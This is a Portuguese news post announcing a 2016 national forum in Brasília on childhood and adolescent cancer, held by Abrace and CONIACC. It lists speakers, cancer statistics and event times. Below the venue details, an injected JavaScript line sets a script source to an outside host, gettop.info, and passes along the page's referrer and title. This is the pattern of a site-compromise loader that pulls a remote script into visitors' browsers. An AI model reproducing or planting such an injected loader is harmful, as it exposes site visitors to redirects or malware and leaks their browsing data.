Fórum debate sobre novos tratamentos para o câncer infantojuvenil

Entre os dias 18 à 20 de outubro, a Abrace irá sediar em Brasília, junto à Confederação Nacional das Instituições de Apoio e Assistência à Criança e ao Adolescente com Câncer – CONIACC, o IV Fórum Nacional de Dirigentes das Instituições de Apoio e Assistência à Criança e ao Adolescente com Câncer. Este ano, o fórum propõe debater sobre dificuldade no diagnóstico e novas drogas para o tratamentos do câncer pediátrico, novo perfil da família e do paciente assistidos, estatísticas do câncer infantojuvenil no Brasil e no mundo, inovações na assistência social, sustentabilidade, entre outras questões pertinentes ao terceiro setor.

00-crianca

Ao todo, são quase 50 instituições filiadas à CONIACC que participarão do fórum, que reconhecem a importância em proporcionar melhor qualidade de vida e dignidade, minimizando a dor e o sofrimento dos pacientes portadores de câncer infantojuvenil.

De acordo com o Instituto Nacional de Câncer – INCA, no Brasil, o câncer já representa a primeira causa de morte (7% do total) por doença entre crianças e adolescentes de 1 a 19 anos, para todas as regiões.  Estima-se que ocorrerão cerca de 12.600 casos novos de câncer em crianças e adolescentes no país por ano, em 2016 e em 2017. As regiões Sudeste e Nordeste apresentarão os maiores números de casos novos, 6.050 e 2.750, respectivamente, seguidas pelas regiões Sul (1.320), Centro-Oeste (1.270) e Norte (1.210).

Entre os palestrantes convidados, estão Teresa Cristina Fonseca, da Sociedade Brasileira de Oncologia Pediátrica, André Torretta, sócio proprietário da Ponte Estratégia, Bruno Botafogo, diretor de planejamento da Serotonina Consultoria e escolhido duas vezes Publicitário do Ano pelo Prêmio Colunistas Brasília – DF e outros.

Durante o fórum, também será realizado o lançamento oficial da parceria da CONIACC com a Polícia Federal, na presença do vice-presidente da Comissão Nacional de Direitos Humanos da PRF, Igor de Carvalho Ramos e do presidente da Comissão da Campanha Policiais Contra o Câncer Infantil, Fabrício Silva Rosa

 

Sobre a Abrace

O trabalho da Abrace é oferecer assistência social para crianças e adolescentes com câncer e doenças do sangue, com dificuldades socioeconômicas, promovendo assim qualidade de vida e colaborando para a promoção de condições ideais de tratamento. A instituição oferece subsídios necessários para o bom curso do tratamento como, instalações adequadas na Casa de Apoio para crianças que não residem no DF e pequenas reformas na casa das que moram na cidade, mas vivem em condições precárias que colocam em risco a saúde do paciente. A instituição fornece, ainda, alimentação, medicamentos, transporte, assistência odontológica e palestras sobre a doença.

 

Serviço:

Dias do Fórum: 18 à 20 de outubro de 2016

Horários:

Dia 18/10 – Das 14 às 17h50

Dia 19/10 – Das 8h30 às 16h30

Dia 20/10 – Das 9h às 18h

Local: Quality Hotel & Suites – Brasília – DF

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário